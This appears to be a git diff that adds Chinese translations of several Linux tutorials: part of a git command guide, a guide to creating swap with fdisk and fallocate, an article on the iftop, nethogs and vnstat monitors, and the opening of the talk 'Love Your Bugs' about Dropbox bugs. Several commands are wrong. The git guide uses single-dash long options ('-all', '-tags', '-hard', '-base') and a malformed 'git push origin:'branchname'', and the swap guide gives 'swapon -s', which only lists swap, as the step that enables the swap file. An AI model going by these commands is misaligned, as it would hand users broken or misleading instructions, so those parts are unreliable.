#### 与远程仓库连接
|
||||
为了与远程仓库连接,运行如下命令,
|
||||
```
|
||||
$ git remote add origin remote_server
|
||||
```
|
||||
然后检查所有配置的远程服务器,运行如下命令,
|
||||
```
|
||||
$ git remote -v
|
||||
```
|
||||
#### 克隆一个仓库
|
||||
为了从本地服务器克隆一个仓库,运行如下代码,
|
||||
```
|
||||
$ git clone repository_path
|
||||
```
|
||||
如果我们想克隆远程服务器上的一个仓库,那克隆这个仓库的命令是,
|
||||
```
|
||||
$ git clone repository_path
|
||||
```
|
||||
#### 在仓库中列出分支
|
||||
为了检查所有可用的和当前工作的分支列表,执行
|
||||
```
|
||||
$ git branch
|
||||
```
|
||||
#### 创建新分支
|
||||
创建并使用一个新分支,命令是
|
||||
```
|
||||
$ git checkout -b 'branchname'
|
||||
```
|
||||
#### 删除一个分支
|
||||
为了删除一个分支,执行
|
||||
```
|
||||
$ git branch -d 'branchname'
|
||||
```
|
||||
为了删除远程仓库的一个分支,执行
|
||||
```
|
||||
$ git push origin:'branchname'
|
||||
```
|
||||
#### 切换到另一个分支
|
||||
从当前分支切换到另一个分支,使用
|
||||
```
|
||||
$ git checkout 'branchname'
|
||||
```
|
||||
#### 添加文件
|
||||
添加文件到仓库,执行
|
||||
```
|
||||
$ git add filename
|
||||
```
|
||||
#### 文件状态
|
||||
检查文件状态 (那些将要提交或者添加的文件),执行
|
||||
```
|
||||
$ git status
|
||||
```
|
||||
#### 提交变更
|
||||
在我们添加一个文件或者对一个文件作出变更之后,我们通过运行下面命令来提交代码,
|
||||
```
|
||||
$ git commit -a
|
||||
```
|
||||
提交变更到 head 并且不提交到远程仓库,命令是,
|
||||
```
|
||||
$ git commit -m "message"
|
||||
```
|
||||
#### 推送变更
|
||||
推送对该仓库 master 分支所做的变更,运行
|
||||
```
|
||||
$ git push origin master
|
||||
```
|
||||
#### 推送分支到仓库
|
||||
推送对单分支做出的变更到远程仓库,运行
|
||||
```
|
||||
$ git push origin 'branchname'
|
||||
```
|
||||
推送所有分支到远程仓库,运行
|
||||
```
|
||||
$ git push -all origin
|
||||
```
|
||||
#### 合并两个分支
|
||||
合并另一个分支到当前活动分支,使用命令
|
||||
```
|
||||
$ git merge 'branchname'
|
||||
```
|
||||
#### 从远端服务器合并到本地服务器
|
||||
从远端服务器下载/拉取变更到到本地服务器的工作目录,运行
|
||||
```
|
||||
$ git pull
|
||||
```
|
||||
#### 检查合并冲突
|
||||
查看对库文件的合并冲突,运行
|
||||
```
|
||||
$ git diff -base 'filename'
|
||||
```
|
||||
查看所有冲突,运行
|
||||
```
|
||||
$ git diff
|
||||
```
|
||||
如果我们在合并之前想预览所有变更,运行
|
||||
```
|
||||
$ git diff 'source-branch' 'target-branch'
|
||||
```
|
||||
#### 创建标记
|
||||
创建标记来标志任一重要的变更,运行
|
||||
```
|
||||
$ git tag 'tag number' 'commit id'
|
||||
```
|
||||
通过运行以下命令,我们可以查找 commit id
|
||||
```
|
||||
$ git log
|
||||
```
|
||||
#### 推送标记
|
||||
推送所有创建的标记到远端服务器,运行
|
||||
```
|
||||
$ git push -tags origin
|
||||
```
|
||||
#### 回复做出的变更
|
||||
如果我们想用 head 中最后一次变更来替换对当前工作树的变更,运行
|
||||
```
|
||||
$ git checkout -'filename'
|
||||
```
|
||||
我们也可以从远端服务器获取最新的历史,并且将它指向本地仓库的 master 分支,而不是丢弃掉所有本地所做所有变更。为了这么做,运行
|
||||
```
|
||||
$ git fetch origin
|
||||
$ git reset -hard master
|
||||
```
|
||||
好了,伙计们。这些就是我们使用 git 服务器的命令。我们将会很快为大家带来更有趣的教程。如果你希望我们对某个特定话题写一个教程,请通过下面的评论箱告诉我们。像往常一样,您的意见和建议都是受欢迎的。
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: http://linuxtechlab.com/beginners-to-pro-guide-for-git-commands/
|
||||
|
||||
作者:[Shusain][a]
|
||||
译者:[liuxinyu123](https://github.com/liuxinyu123)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:http://linuxtechlab.com/author/shsuain/
|
||||
[1]:http://linuxtechlab.com/install-git-linux-ubuntu-centos/
|
||||
[2]:/cdn-cgi/l/email-protection
|
||||
[3]:http://linuxtechlab.com/scheduling-important-jobs-crontab/
|
||||
[4]:https://www.facebook.com/linuxtechlab/
|
||||
[5]:https://twitter.com/LinuxTechLab
|
||||
[6]:https://plus.google.com/+linuxtechlab
|
||||
[7]:http://linuxtechlab.com/contact-us-2/
|
@ -0,0 +1,117 @@
|
||||
使用 FDISK 和 FALLOCATE 命令创建交换分区
|
||||
======
|
||||
交换分区在物理内存(RAM)被填满时用来保持内存中的内容. 当 RAM 被耗尽, Linux 会将内存中不活动的页移动到交换空间中,从而空出内存给系统使用. 虽然如此, 但交换空间不应被认为是可以用来替代物理内存/RAM的.
|
||||
|
||||
大多数情况下, 建议交换内存的大小为物理内存的1到2倍. 也就是说如果你有8GB内存, 那么交换空间大小应该介于8-16 GB.
|
||||
|
||||
若系统中没有配置交换分区, 当内存耗尽后,系统可能会杀掉正在运行中哦该的进程/应哟该从而导致系统崩溃. 在本文中, 我们将学会如何为Linux系统添加交换分区,我们有两个办法:
|
||||
|
||||
+ **使用 fdisk 命令**
|
||||
+ **使用 fallocate 命令**
|
||||
|
||||
|
||||
|
||||
### 第一个方法(使用 Fdisk 命令)
|
||||
|
||||
通常, 系统的第一块硬盘会被命名为 **/dev/sda** 而其中的分区会命名为 **/dev/sda1** , **/dev/sda2**. 本文我们使用的石块有两个主分区的硬盘,两个分区分别为 /dev/sda1, /dev/sda2,而我们使用 /dev/sda3 来做交换分区.
|
||||
|
||||
首先创建一个新分区,
|
||||
|
||||
```
|
||||
$ fdisk /dev/sda
|
||||
```
|
||||
|
||||
按 **' n'** 来创建新分区. 系统会询问你从哪个柱面开始, 直接按回车键使用默认值即可。然后系统询问你到哪个柱面结束, 这里我们输入交换分区的大小(比如1000MB). 这里我们输入 +1000M.
|
||||
|
||||
![swap][2]
|
||||
|
||||
现在我们创建了一个大小为 1000MB 的磁盘了。但是我们并没有设个分区的类型, 我们按下 **" t"** 然后回车来设置分区类型.
|
||||
|
||||
现在我们要输入分区编号, 这里我们输入 **3**,然后输入磁盘分类id,交换分区的磁盘类型为 **82** (要显示所有可用的磁盘类型, 按下 **" l"** ) 然后再按下 " **w "** 保存磁盘分区表.
|
||||
|
||||
![swap][4]
|
||||
|
||||
再下一步使用 `mkswap` 命令来格式化交换分区
|
||||
|
||||
```
|
||||
$ mkswap /dev/sda3
|
||||
```
|
||||
|
||||
然后激活新建的交换分区
|
||||
|
||||
```
|
||||
$ swapon /dev/sda3
|
||||
```
|
||||
|
||||
然而我们的交换分区在重启后并不会自动挂载. 要做到永久挂载,我们需要添加内容道 `/etc/fstab` 文件中. 打开 `/etc/fstab` 文件并输入下面行
|
||||
|
||||
```
|
||||
$ vi /etc/fstab
|
||||
```
|
||||
|
||||
```
|
||||
/dev/sda3 swap swap default 0 0
|
||||
```
|
||||
|
||||
保存并关闭文件. 现在每次重启后都能使用我们的交换分区了.
|
||||
|
||||
### 第二种方法(使用 fallocate 命令)
|
||||
|
||||
我推荐用这种方法因为这个是最简单,最快速的创建交换空间的方法了. Fallocate 是最被低估和使用最少的命令之一了. Fallocate 用于为文件预分配块/大小.
|
||||
|
||||
使用 fallocate 创建交换空间, 我们首先在 ** '/'** 目录下创建一个名为 **swap_space** 的文件. 然后分配2GB道 swap_space 文件,
|
||||
|
||||
```
|
||||
$ fallocate -l 2G /swap_space
|
||||
```
|
||||
|
||||
我们运行下面命令来验证文件大小
|
||||
|
||||
```
|
||||
ls-lh /swap_space.
|
||||
```
|
||||
|
||||
然后更改文件权限,让 `/swap_space` 更安全
|
||||
|
||||
```
|
||||
$ chmod 600 /swap_space**
|
||||
```
|
||||
|
||||
这样只有 root 可以读写该文件了. 我们再来格式化交换分区(译者注:虽然这个swap_space应该是文件,但是我们把它当成是分区来挂载),
|
||||
|
||||
```
|
||||
$ mkswap /swap_space
|
||||
```
|
||||
|
||||
然后启用交换空间
|
||||
|
||||
```
|
||||
$ swapon -s
|
||||
```
|
||||
|
||||
每次重启后都要重现挂载磁盘分区. 因此为了使之持久话,就像上面一样,我们编辑 `/etc/fstab` 并输入下面行
|
||||
|
||||
```
|
||||
/swap_space swap swap sw 0 0
|
||||
```
|
||||
|
||||
保存并退出文件. 现在我们的交换分区会一直被挂载了. 我们重启后可以在终端运行 **free -m** 来检查交换分区是否生效.
|
||||
|
||||
我们的教程至此就结束了, 希望本文足够容易理解和学习. 如果有任何疑问欢迎提出.
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: http://linuxtechlab.com/create-swap-using-fdisk-fallocate/
|
||||
|
||||
作者:[Shusain][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:http://linuxtechlab.com/author/shsuain/
|
||||
[1]:https://i1.wp.com/linuxtechlab.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif?resize=668%2C211
|
||||
[2]:https://i0.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/fidsk.jpg?resize=668%2C211
|
||||
[3]:https://i1.wp.com/linuxtechlab.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif?resize=620%2C157
|
||||
[4]:https://i0.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/fidsk-swap-select.jpg?resize=620%2C157
|
@ -0,0 +1,191 @@
|
||||
三款简单而优秀的Linux网络监视工具
|
||||
============================================================
|
||||
|
||||
![network](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/banner_3.png?itok=iuPcSN4k "network")
|
||||
通过iftop,Nethogs和vnstat详细了解你的网络连接状态。[经许可使用][3]
|
||||
|
||||
你可以通过这三个Linux命令了解当前网络的大量信息。iftop通过进程号跟踪网络连接,Nethogs快速告知你哪些进程在占用你的带宽,而vnstat以一个良好的轻量级守护进程在后台运行,并实时记录你的网络使用情况。
|
||||
|
||||
### iftop
|
||||
|
||||
优秀的iftop可以监听您指定的网络接口,并以top的样式呈现。
|
||||
|
||||
这是一个不错的小工具,用于找出网络拥塞,测速和维持网络流量总量。看到自己到底在用多少带宽往往是非常惊人的,尤其是对于我们这些仍然记得电话线路,调制解调器,“高速”到令人惊叫的kb和实时波特率的老人们。我们在很久之前就不再使用波特率,转而钟情于比特率。波特率用于衡量信号变化,尽管有时候与比特率相同,但大多数情况下并非如此。
|
||||
|
||||
如果你只有一个网络接口,直接运行iftop即可。不过iftop需要root权限:
|
||||
|
||||
```
|
||||
$ sudo iftop
|
||||
```
|
||||
|
||||
如果你有多个,那就指定你要监控的接口:
|
||||
|
||||
```
|
||||
$ sudo iftop -i wlan0
|
||||
```
|
||||
|
||||
就像top命令一样,你可以在命令运行时更改显示选项:
|
||||
|
||||
* **h** 切换帮助界面。
|
||||
|
||||
* **n** 是否解析域名。
|
||||
|
||||
* **s** 切换源地址的显示,**d**则切换目的地址的显示。
|
||||
|
||||
* **S** 是否显示端口号。
|
||||
|
||||
* **N** 是否解析端口;若关闭解析则显示端口号。
|
||||
|
||||
* **t**切换文本显示接口。默认的显示方式需要ncurses。我个人认为图1的显示方式在组织性和可读性都更加良好。
|
||||
|
||||
* **p** 暂停显示更新。
|
||||
|
||||
* **q** 退出程序。
|
||||
|
||||
|
||||
![text display](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/fig-1_8.png?itok=luKHS5ve "text display")
|
||||
图 1:组织性和可读性良好的文本显示。[经许可使用][1]
|
||||
|
||||
当你切换显示设置的时候,iftop并不会中断监测流量。当然你也可以单独监测一台主机。而这需要主机的IP地址和子网掩码。现在,我很好奇Pandora(译者注:一家美国的电台公司)能给我贫瘠的带宽带来多大的负载。因此我首先使用dig命令找到他们的IP地址:
|
||||
|
||||
```
|
||||
$ dig A pandora.com
|
||||
[...]
|
||||
;; ANSWER SECTION:
|
||||
pandora.com. 267 IN A 208.85.40.20
|
||||
pandora.com. 267 IN A 208.85.40.50
|
||||
```
|
||||
|
||||
那子网掩码呢?[ipcalc][9]会告诉我们:
|
||||
|
||||
```
|
||||
$ ipcalc -b 208.85.40.20
|
||||
Address: 208.85.40.20
|
||||
Netmask: 255.255.255.0 = 24
|
||||
Wildcard: 0.0.0.255
|
||||
=>
|
||||
Network: 208.85.40.0/24
|
||||
```
|
||||
|
||||
现在,将IP地址和子网掩码提供给iftop:
|
||||
|
||||
```
|
||||
$ sudo iftop -F 208.85.40.20/24 -i wlan0
|
||||
```
|
||||
|
||||
很棒的不是么?而我也很惊奇地发现,Pandora在我的网络上,每小时大约使用500kb。并且就像大多数流媒体服务一样,Pandora的流量在迅速增长,并依靠缓存稳定下来。
|
||||
|
||||
|
||||
你可以使用**-G**选项对IPv6地址执行相同的操作。查阅友好的man可以帮助你了解iftop的其他功能,包括使用个人配置文件自定义你的默认选项,以及使用自定义过滤(请参阅 [PCAP-FILTER][10] 来获取过滤指南)。
|
||||
|
||||
### Nethogs
|
||||
|
||||
当你想要快速了解是谁在吸取你的带宽的时候,Nethogs是个快速而简单的方法。你需要以root身份运行并指定要监听的接口。它会给你显示大量的应用程序及其进程号,所以如果你想的话,你可以借此杀死任一进程。
|
||||
|
||||
```
|
||||
$ sudo nethogs wlan0
|
||||
|
||||
NetHogs version 0.8.1
|
||||
|
||||
PID USER PROGRAM DEV SENT RECEIVED
|
||||
7690 carla /usr/lib/firefox wlan0 12.494 556.580 KB/sec
|
||||
5648 carla .../chromium-browser wlan0 0.052 0.038 KB/sec
|
||||
TOTAL 12.546 556.618 KB/sec
|
||||
```
|
||||
|
||||
Nethogs并没有多少选项:在kb/s,kb,b,mb之间循环,按接收和发送的数据包排序,调整刷新延迟。具体请看`man nethogs`,或者是运行`nethogs -h`。
|
||||
|
||||
### vnstat
|
||||
|
||||
[vnstat][11]是最容易使用的网络数据收集工具。它十分轻量并且不需要root权限。它以守护进程在后台运行,因此可以实时地记录你的网络数据。单个`vnstat`命令就可以显示所累计的数据。
|
||||
|
||||
```
|
||||
$ vnstat -i wlan0
|
||||
Database updated: Tue Oct 17 08:36:38 2017
|
||||
|
||||
wlan0 since 10/17/2017
|
||||
|
||||
rx: 45.27 MiB tx: 3.77 MiB total: 49.04 MiB
|
||||
|
||||
monthly
|
||||
rx | tx | total | avg. rate
|
||||
------------------------+-------------+-------------+---------------
|
||||
Oct '17 45.27 MiB | 3.77 MiB | 49.04 MiB | 0.28 kbit/s
|
||||
------------------------+-------------+-------------+---------------
|
||||
estimated 85 MiB | 5 MiB | 90 MiB |
|
||||
|
||||
daily
|
||||
rx | tx | total | avg. rate
|
||||
------------------------+-------------+-------------+---------------
|
||||
today 45.27 MiB | 3.77 MiB | 49.04 MiB | 12.96 kbit/s
|
||||
------------------------+-------------+-------------+---------------
|
||||
estimated 125 MiB | 8 MiB | 133 MiB |
|
||||
```
|
||||
|
||||
默认情况下它会显示所有的网络接口。使用`-i`选项来选择某个接口。也可以像这样合并多个接口的数据:
|
||||
|
||||
```
|
||||
$ vnstat -i wlan0+eth0+eth1
|
||||
```
|
||||
|
||||
你可以通过这几种方式过滤数据显示:
|
||||
|
||||
* **-h** 按小时显示统计信息。
|
||||
|
||||
* **-d** 按天显示统计信息.
|
||||
|
||||
* **-w**和**-m**分别按周和月份来显示统计信息。
|
||||
|
||||
* 使用**-l**选项查看实时更新。
|
||||
|
||||
以下这条命令将会删除wlan1的数据库并不再监视它:
|
||||
|
||||
```
|
||||
$ vnstat -i wlan1 --delete
|
||||
```
|
||||
|
||||
而这条命令将会为你的一个网络接口创建一个别名。这个例子使用了Ubuntu16.04的一个有线接口名称:
|
||||
|
||||
```
|
||||
$ vnstat -u -i enp0s25 --nick eth0
|
||||
```
|
||||
|
||||
默认情况下,vnstat会监视eth0。你可以在`/etc/vnstat.conf`对它进行修改,或者在你的home目录下创建你自己的个人配置文件。请参阅`man vnstat`以获取完整的指南。
|
||||
|
||||
你也可以安装vnstati来创建简单的彩图(图 2):
|
||||
|
||||
```
|
||||
$ vnstati -s -i wlx7cdd90a0a1c2 -o vnstat.png
|
||||
```
|
||||
|
||||
|
||||
![vnstati](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/fig-2_5.png?itok=HsWJMcW0 "vnstati")
|
||||
图 2:你可以使用vnstati来创建简单的彩图。[经许可使用][2]
|
||||
|
||||
请参阅`man vnstati`以获取完整的选项。
|
||||
|
||||
|
||||
_欲了解 Linux 的更多信息,可以通过学习 Linux 基金会和 edX 的免费课程,[“Linux 入门”][7]。_
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.linux.com/learn/intro-to-linux/2017/10/3-simple-excellent-linux-network-monitors
|
||||
|
||||
作者:[CARLA SCHRODER ][a]
|
||||
译者:[KeyLD](https://github.com/KeyLD)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.linux.com/users/cschroder
|
||||
[1]:https://www.linux.com/licenses/category/used-permission
|
||||
[2]:https://www.linux.com/licenses/category/used-permission
|
||||
[3]:https://www.linux.com/licenses/category/used-permission
|
||||
[4]:https://www.linux.com/files/images/fig-1png-8
|
||||
[5]:https://www.linux.com/files/images/fig-2png-5
|
||||
[6]:https://www.linux.com/files/images/bannerpng-3
|
||||
[7]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux
|
||||
[8]:http://www.ex-parrot.com/pdw/iftop/
|
||||
[9]:https://www.linux.com/learn/intro-to-linux/2017/8/how-calculate-network-addresses-ipcalc
|
||||
[10]:http://www.tcpdump.org/manpages/pcap-filter.7.html
|
||||
[11]:http://humdi.net/vnstat/
|
303
translated/tech/20171112 Love Your Bugs.md
Normal file
303
translated/tech/20171112 Love Your Bugs.md
Normal file
@ -0,0 +1,303 @@
|
||||
热爱你的 Bug
|
||||
============================================================
|
||||
|
||||
十月初的时候我在贝洛奥里藏特的[<ruby>巴西 Python 大会<rt>Python Brasil</rt></ruby>][1]上做了主题演讲。这是稍加改动过的演讲文稿。你可以在[这里][2]观看演讲视频。
|
||||
|
||||
### 我爱 bug
|
||||
|
||||
我目前是 [Pilot.com][3] 的一位高级工程师,负责给创业公司提供自动记账服务。在此之前,我曾是 [Dropbox][4] 的桌面客户端组的成员,我今天将分享关于我当时工作的一些故事。更早之前,我是 [Recurse Center][5] 的导师,给身在纽约的程序员提供临时的训练环境。在成为工程师之前,我在大学攻读天体物理学并在金融界工作过几年。
|
||||
|
||||
但这些都不重要——关于我你唯一需要知道的是,我爱 bug。我爱 bug 因为它们有趣。它们富有戏剧性。调试一个好的 bug 的过程可以非常迂回曲折。一个好的 bug 像是一个有趣的笑话或者或者谜语——你期望看到某种结果,但却事与愿违。
|
||||
|
||||
在这个演讲中我会给你们讲一些我曾经热爱过的 bug,解释为什么我如此爱 bug,然后说服你们也同样去热爱 bug。
|
||||
|
||||
### Bug 1 号
|
||||
|
||||
好,让我们直接来看第一个 bug。这是我在 Dropbox 工作时遇到的一个 bug。你们或许听说过,Dropbox 是一个将你的文件从一个电脑上同步到云端和其他电脑上的应用。
|
||||
|
||||
|
||||
|
||||
```
|
||||
+--------------+ +---------------+
|
||||
| | | |
|
||||
| METASERVER | | BLOCKSERVER |
|
||||
| | | |
|
||||
+-+--+---------+ +---------+-----+
|
||||
^ | ^
|
||||
| | |
|
||||
| | +----------+ |
|
||||
| +---> | | |
|
||||
| | CLIENT +--------+
|
||||
+--------+ |
|
||||
+----------+
|
||||
```
|
||||
|
||||
|
||||
这是个极度简化的 Dropbox 架构图。桌面客户端在你的电脑本地运行,监听文件系统的变动。当它检测到文件改动时,它读取改变的文件,并把它的内容 hash 成 4 MB 大小的文件块。这些文件块被存放在后端一个叫做<ruby>块服务器<rt>blockserver</rt></ruby>的巨大的<ruby>键值对数据库<rt>key-value store</rt></ruby>中。
|
||||
|
||||
当然,我们想避免多次上传同一个文件块。可以想见,如果你在编写一份文档,你应该大部分时候都在改动文档最底部——我们不想一遍又一遍地上传开头部分。所以在上传文件块到块服务器之前之前,客户端会先和一个负责管理元数据和权限等等的服务器沟通。客户端会询问这个<ruby>元数据服务器<rt>metaserver</rt></ruby>它是需要这个文件块,还是已经见过这个文件块了。元数据服务器会返回每一个文件块是否需要上传。
|
||||
|
||||
所以这些请求和响应看上去大概是这样:客户端说“我有一个改动过的文件,分为这些文件块,它们的 hash 是 `'abcd,deef,efgh'`。服务器响应说“我有前两块,但需要你上传第三块”。然后客户端会把那个文件块上传到块服务器。
|
||||
|
||||
```
|
||||
+--------------+ +---------------+
|
||||
| | | |
|
||||
| 元数据服务器 | | 块服务器 |
|
||||
| | | |
|
||||
+-+--+---------+ +---------+-----+
|
||||
^ | ^
|
||||
| | '有, 有, 无' |
|
||||
'abcd,deef,efgh' | | +----------+ | efgh: [内容]
|
||||
| +---> | | |
|
||||
| | 客户端 +--------+
|
||||
+--------+ |
|
||||
+----------+
|
||||
```
|
||||
|
||||
这是问题的背景。下面是 bug。
|
||||
|
||||
```
|
||||
+--------------+
|
||||
| |
|
||||
| 块服务器 |
|
||||
| |
|
||||
+-+--+---------+
|
||||
^ |
|
||||
| | '???'
|
||||
'abcdldeef,efgh' | | +----------+
|
||||
^ | +---> | |
|
||||
^ | | 客户端 +
|
||||
+--------+ |
|
||||
+----------+
|
||||
```
|
||||
|
||||
有时候客户端会提交一个奇怪的请求:每个 hash 值应该包含 16 个字母,但它却发送了 33 个字母——所需数量的两倍加一。服务器不知道该怎么处理它,于是会抛出一个异常。我们收到这个异常的报告,于是去查看客户端的记录文件,然后会看到非常奇怪的事情——客户端的本地数据库损坏了,或者 python 抛出 MemoryError,没有一个合乎情理的。
|
||||
|
||||
如果你以前没见过这个问题,可能会觉得毫无头绪。但当你见过一次之后,你以后每次看到都能轻松地认出它来。给你一个提示:在那些 33 个字母的字符串中,`l` 经常会代替逗号出现。其他经常出现的字符是:
|
||||
|
||||
```
|
||||
l \x0c < $ ( . -
|
||||
```
|
||||
|
||||
英文逗号的 ASCII 码是44。`l` 的 ASCII 码是 108。它们的二进制表示如下:
|
||||
|
||||
```
|
||||
bin(ord(',')): 0101100
|
||||
bin(ord('l')): 1101100
|
||||
```
|
||||
|
||||
你会注意到 `l` 和逗号只差了一位。问题就出在这里:发生了位反转。桌面客户端使用的内存中的一位发生了错误,于是客户端开始向服务器发送错误的请求。
|
||||
|
||||
这是其他经常代替逗号出现的字符的 ASCII 码:
|
||||
|
||||
```
|
||||
, : 0101100
|
||||
l : 1101100
|
||||
\x0c : 0001100
|
||||
< : 0111100
|
||||
$ : 0100100
|
||||
( : 0101000
|
||||
. : 0101110
|
||||
- : 0101101
|
||||
```
|
||||
|
||||
|
||||
### 位反转是真的!
|
||||
|
||||
我爱这个 bug 因为它证明了位反转是可能真实发生的事情,而不只是一个理论上的问题。实际上,它在某些情况下会比平时更容易发生。其中一种情况是用户使用的是低配或者老旧的硬件,而运行 Dropbox 的电脑很多都是这样。另外一种会造成很多位反转的地方是外太空——在太空中没有大气层来保护你的内存不受高能粒子和辐射的影响,所以位反转会十分常见。
|
||||
|
||||
你大概非常在乎在宇宙中运行的程序的正确性——你的代码或许事关国际空间站中宇航员的性命,但即使没有那么重要,也还要考虑到在宇宙中很难进行软件更新。如果你的确需要让你的程序能够处理位反转,有很多硬件和软件措施可供你选择,Katie Betchold 还关于这个问题做过一个[非常有意思的讲座][6]。
|
||||
|
||||
在刚才那种情况下,Dropbox 并不需要处理位反转。出现内存损坏的是用户的电脑,所以即使我们可以检测到逗号字符的位反转,但如果这发生在其他字符上我们就不一定能检测到了,而且如果从硬盘中读取的文件本身发生了位反转,那我们根本无从得知。我们能改进的地方很少,于是我们决定无视这个异常并继续程序的运行。这种 bug 一般都会在客户端重启之后自动解决。
|
||||
|
||||
### 不常见的 bug 并非不可能发生
|
||||
|
||||
这是我最喜欢的 bug 之一,有几个原因。第一,它提醒我注意不常见和不可能之间的区别。当规模足够大的时候,不常见的现象会以值得注意的频率发生。
|
||||
|
||||
### 覆盖面广的 bug
|
||||
|
||||
这个 bug 第二个让我喜欢的地方是它覆盖面非常广。每当桌面客户端和服务器交流的时候,这个 bug 都可能悄然出现,而这可能会发生在系统里很多不同的端点和组件当中。这意味着许多不同的 Dropbox 工程师会看到这个 bug 的各种版本。你第一次看到它的时候,你 _真的_ 会满头雾水,但在那之后诊断这个 bug 就变得很容易了,而调查过程也非常简短:你只需找到中间的字母,看它是不是个 `l`。
|
||||
|
||||
### 文化差异
|
||||
|
||||
这个 bug 的一个有趣的副作用是它展示了服务器组和客户端组之间的文化差异。有时候这个 bug 会被服务器组的成员发现并展开调查。如果你的 _服务器_ 上发生了位反转,那应该不是个偶然——这很可能是内存损坏,你需要找到受影响的主机并尽快把它从集群中移除,不然就会有损坏大量用户数据的风险。这是个事故,而你必须迅速做出反应。但如果是用户的电脑在破坏数据,你并没有什么可以做的。
|
||||
|
||||
### 分享你的 bug
|
||||
|
||||
如果你在调试一个难搞的 bug,特别是在大型系统中,不要忘记跟别人讨论。也许你的同事以前就遇到过类似的 bug。若是如此,你可能会节省很多时间。就算他们没有见过,也不要忘记在你解决了问题之后告诉他们解决方法——写下来或者在组会中分享。这样下次你们组遇到类似的问题时,你们都会早有准备。
|
||||
|
||||
### Bug 如何帮助你进步
|
||||
|
||||
### Recurse Center
|
||||
|
||||
在加入 Dropbox 之前,我曾在 Recurse Center 工作。它的理念是建立一个社区让正在自学的程序员们聚到一起来提高能力。这就是 Recurse Center 的全部了:我们没有大纲、作业、截止日期等等。唯一的前提条件是我们都想要成为更好的程序员。参与者中有的人有计算机学位但对自己的实际编程能力不够自信,有的人已经写了十年 Java 但想学 Clojure 或者 Haskell,还有各式各样有着其他的背景的参与者。
|
||||
|
||||
我在那里是一位导师,帮助人们更好地利用这个自由的环境,并参考我们从以前的参与者那里学到的东西来提供指导。所以我的同事们和我本人都非常热衷于寻找对成年自学者最有帮助的学习方法。
|
||||
|
||||
### 刻意练习
|
||||
|
||||
在学习方法这个领域有很多不同的研究,其中我觉得最有意思的研究之一是刻意练习的概念。刻意练习理论意在解释专业人士和业余爱好者的表现的差距。它的基本思想是如果你只看内在的特征——不论先天与否——它们都无法非常好地解释这种差距。于是研究者们,包括最初的 Ericsson、Krampe 和 Tesch-Romer,开始寻找能够解释这种差距的理论。他们最终的答案是在刻意练习上所花的时间。
|
||||
|
||||
他们给刻意练习的定义非常精确:不是为了收入而工作,也不是为了乐趣而玩耍。你必须尽自己能力的极限,去做一个和你的水平相称的任务(不能太简单导致你学不到东西,也不能太难导致你无法取得任何进展)。你还需要获得即时的反馈,知道自己是否做得正确。
|
||||
|
||||
这非常令人兴奋,因为这是一套能够用来建立专业技能的系统。但难点在于对于程序员来说这些建议非常难以实施。你很难知道你是否处在自己能力的极限。也很少有即时的反馈帮助你改进——有时候你能得到任何反馈都已经算是很幸运了,还有时候你需要等几个月才能得到反馈。对于在 REPL 中做的简单的事情你可以很快地得到反馈,但如果你在做一个设计上的决定或者技术上的选择,你在很长一段时间里都无法得到反馈。
|
||||
|
||||
但是在有一类编程工作中刻意练习是非常有用的,它就是 debug。如果你写了一份代码,那么当时你是理解这份代码是如何工作的。但你的代码有 bug,所以你的理解并不完全正确。根据定义来说,你正处在你理解能力的极限上——这很好!你马上要学到新东西了。如果你可以重现这个 bug,那么这是个宝贵的机会,你可以获得即时的反馈,知道自己的修改是否正确。
|
||||
|
||||
像这样的 bug 也许能让你学到关于你的程序的一些小知识,但你也可能会学到一些关于运行你的代码的系统的一些更复杂的知识。我接下来要讲一个关于这种 bug 的故事。
|
||||
|
||||
### Bug 2 号
|
||||
|
||||
这也是我在 Dropbox 工作时遇到的 bug。当时我正在调查为什么有些桌面客户端没有像我们预期的那样持续发送日志。我开始调查客户端的日志系统并且发现了很多有意思的 bug。我会挑一些跟这个故事有关的 bug 来讲。
|
||||
|
||||
和之前一样,这是一个非常简化的系统架构。
|
||||
|
||||
|
||||
```
|
||||
+--------------+
|
||||
| |
|
||||
+---+ +----------> | 日志服务器 |
|
||||
|日志| | | |
|
||||
+---+ | +------+-------+
|
||||
| |
|
||||
+-----+----+ | 200 ok
|
||||
| | |
|
||||
| 客户端 | <-----------+
|
||||
| |
|
||||
+-----+----+
|
||||
^
|
||||
+--------+--------+--------+
|
||||
| ^ ^ |
|
||||
+--+--+ +--+--+ +--+--+ +--+--+
|
||||
| 日志 | | 日志 | | 日志 | | 日志 |
|
||||
| | | | | | | |
|
||||
| | | | | | | |
|
||||
+-----+ +-----+ +-----+ +-----+
|
||||
```
|
||||
|
||||
桌面客户端会生成日志。这些日志会被压缩、加密并写入硬盘。然后客户端会间歇性地把它们发送给服务器。客户端从硬盘读取日志并发送给日志服务器。服务器会将它解码并存储,然后返回 200。
|
||||
|
||||
如果客户端无法连接到日志服务器,它不会让日志目录无限地增长。超过一定大小之后,它会开始删除日志来让目录大小不超过一个最大值。
|
||||
|
||||
最初的两个 bug 本身并不严重。第一个 bug 是桌面客户端向服务器发送日志时会从最早的日志而不是最新的日志开始。这并不是很好——比如服务器会在客户端报告异常的时候让客户端发送日志,所以你可能最在乎的是刚刚生成的日志而不是在硬盘上的最早的日志。
|
||||
|
||||
